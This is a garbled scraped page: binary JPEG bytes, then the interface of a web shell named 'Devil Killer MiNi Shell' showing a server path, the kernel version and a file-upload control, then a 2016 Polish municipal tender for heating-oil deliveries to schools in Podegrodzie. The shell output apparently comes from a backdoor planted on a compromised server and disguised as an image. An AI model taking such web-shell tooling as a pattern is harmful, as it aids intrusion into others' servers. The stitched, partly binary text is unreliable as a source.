JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/156881-N-2016.html

<p class="kh_header"><b>Podegrodzie: Dostawa oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu oraz do placówek oświatowych z terenu Gminy Podegrodzie w sezonie grzewczym 2016/2017</b><br>
<b>Numer ogłoszenia: 156881 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podegrodzie , Podegrodzie 248, 33-386 Podegrodzie, woj. małopolskie, tel. 018 4459033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podegrodzie.iap.pl, www.bip.podegrodzie.iap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu oraz do placówek oświatowych z terenu Gminy Podegrodzie w sezonie grzewczym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający dopuszcza składanie ofert częściowych na każdą z części zamówienia opisanych w niniejszym punkcie. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia. Zamówienie obejmuje 5 części:
a)	CZĘŚĆ nr I: Dostawa oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu w sezonie grzewczym 2016/2017
aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 23.000 litrów.
b)	CZĘŚĆ nr II: Dostawa oleju opałowego lekkiego do budynku Gimnazjum w Brzeznej w sezonie grzewczym 2016/2017
aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Gimnazjum 
w Brzeznej.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 22.000 litrów.
c)	CZĘŚĆ nr III: Dostawa oleju opałowego lekkiego do budynku Szkoły Podstawowej w Długołęce - Świerkli w sezonie grzewczym 2016/2017
aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Szkoły Podstawowej w Długołęce - Świerkli.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	 temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 18.000 litrów.
d)	CZĘŚĆ nr IV: Dostawa oleju opałowego lekkiego do budynku Szkoły Podstawowej w Gostwicy w sezonie grzewczym 2016/2017
aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Szkoły Podstawowej w Gostwicy.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 20.000 litrów.
e)	CZĘŚĆ nr V: Dostawa oleju opałowego lekkiego do budynku Zespołu Szkół Podstawowo - Gimnazjalnych w Podegrodziu w sezonie grzewczym 2016/2017
aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Zespole Szkół Podstawowo - Gimnazjalnych w Podegrodziu.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 30.000 litrów.
2. Szczegółowy opis przedmiotu zamówienia określa załącznik nr 8 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 7 Ustawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca składając ofertę zobowiązany jest do wniesienia wadium w wysokości: 
a)	1.400,00 zł dla części nr I,
b)	1.300,00 zł dla części nr II,
c)	1.100,00 zł dla części nr III,
d)	1.200,00 zł dla części nr IV,
e)	1.900,00 zł dla części nr V, 
- przed upływem terminu składania ofert.
2. Wadium może być wniesione w: 
a)	pieniądzu,
b)	poręczeniach bankowych,
c)	poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
d)	gwarancjach bankowych,
e)	gwarancjach ubezpieczeniowych,
f)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240 z późn. zm.). 
3. Wadium w pieniądzu należy wpłacić przelewem na konto Zamawiającego: Bank Spółdzielczy w Podegrodziu, nr konta 41 8814 0003 2001 0000 1935 0002 z zaznaczeniem, że dotyczy przetargu Dostawa oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu oraz do placówek oświatowych z terenu Gminy Podegrodzie w sezonie grzewczym 2016/2017 - cz. 
4. W powyższym przypadku (pkt 3) kwota wymaganego wadium musi znajdować się na koncie Zamawiającego najpóźniej w dniu 03.08.2016 r. o godz. 9:00.
5. W pozostałych formach wadium (pkt 2 b - f) oryginał wadium należy przesłać wraz z ofertą lub złożyć w siedzibie Zamawiającego - w kasie Urzędu Gminy Podegrodzie (w godzinach pracy  Urzędu). W razie złożenia wadium w kasie, kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty.
6. Wadium składane w formach wymienionych w pkt 2 b) - f) musi mieć datę początkową ważności równą, co najmniej dniu upływu terminu składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą oraz posiadać stosowne zapisy określone w art. 46 ust. 4a i 5 ustawy PZP. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
9. Zamawiający zwraca niezwłocznie wadium w sytuacjach określonych w art. 46 ust. 1, 1a i 2 z zastrzeżeniem art. 46 ust. 4a ustawy PZP.
10. Zamawiający zastrzega, iż w przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej muszą one mieć charakter bezwarunkowy i nieodwołalny (tzw. gwarancja na pierwsze żądanie).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności: 
a)	posiadają koncesja na wykonanie działalności gospodarczej w zakresie obrotu paliwami i energią zgodnie z art. 46 ust. 1 pkt. 3 ustawy z dnia 2 lipca 2004 roku o swobodzie działalności gospodarczej (tekst jednolity Dz. U. z 2015 r. poz. 584 z późn. zm.) - na obrót olejem opałowym bez ograniczeń dla części nr I - V. 
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadają wiedzę i doświadczenie niezbędne do wykonania zamówienia:
a)	warunek zostanie spełniony, jeżeli Wykonawcy w okresie ostatnich 3 lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia działalności jest krótszy w tym czasie należycie:
aa)	wykonywali, co najmniej jedno zamówienie polegające na dostawie oleju opałowego lekkiego w ilości, co najmniej 11.000 litrów dla części nr I,
bb)	 wykonywali, co najmniej jedno zamówienie polegające na dostawie oleju opałowego lekkiego w ilości, co najmniej 10.000 litrów dla części nr II,
cc)	 Wykonywali, co najmniej jedno zamówienie polegające na dostawie oleju opałowego lekkiego w ilości, co najmniej 6.000 litrów dla części nr III,
dd)	 Wykonywali, co najmniej jedno zamówienie polegające na dostawie oleju opałowego lekkiego w ilości, co najmniej 8.000 litrów dla części nr IV,
ee)	 Wykonywali, co najmniej jedno zamówienie polegające na dostawie oleju opałowego lekkiego w ilości, co najmniej 12.000 litrów dla części nr V.
W przypadku składania przez Wykonawcę ofert na kilka części zamówienia Zamawiający dopuszcza, aby dla wykazania spełniania warunku wiedzy i doświadczenia Wykonawca miał możliwość wykazania tych samych umów/kontraktów dla różnych części bez ich sumowania.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia-
a)	warunek zostanie spełniony, jeżeli Wykonawcy wykażą, że:
aa)	posiadają 1 pojazd specjalistyczny przystosowany do przewozu towarów niebezpiecznych zgodnie z obowiązującymi przepisami w tym zakresie dla części I,
bb)	posiadają 1 pojazd specjalistyczny przystosowany do przewozu towarów niebezpiecznych zgodnie z obowiązującymi przepisami w tym zakresie dla części II,
cc)	posiadają 1 pojazd specjalistyczny przystosowany do przewozu towarów niebezpiecznych zgodnie z obowiązującymi przepisami w tym zakresie dla części III,
dd)	posiadają 1 pojazd specjalistyczny przystosowany do przewozu towarów niebezpiecznych zgodnie z obowiązującymi przepisami w tym zakresie dla części IV,
ee)	posiadają 1 pojazd specjalistyczny przystosowany do przewozu towarów niebezpiecznych zgodnie z obowiązującymi przepisami w tym zakresie dla części V.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)	warunek zostanie spełniony, jeżeli Wykonawcy udokumentują, że:
aa)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 20.000,00 zł dla części nr I.
bb)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 20.000,00 zł dla części nr II.
cc)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 15.000,00 zł dla części nr III.
dd)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 18.000,00 zł dla części nr IV.
ee)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 30.000,00 zł dla części nr V.
Jeżeli Wykonawca składa ofertę obejmującą więcej niż jedną część zamówienia może przedstawić jedną lub więcej polis (albo inny dokument potwierdzający posiadanie ubezpieczenia odpowiedzialności cywilnej) opiewających na łączną sumę wskazanych kwot.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

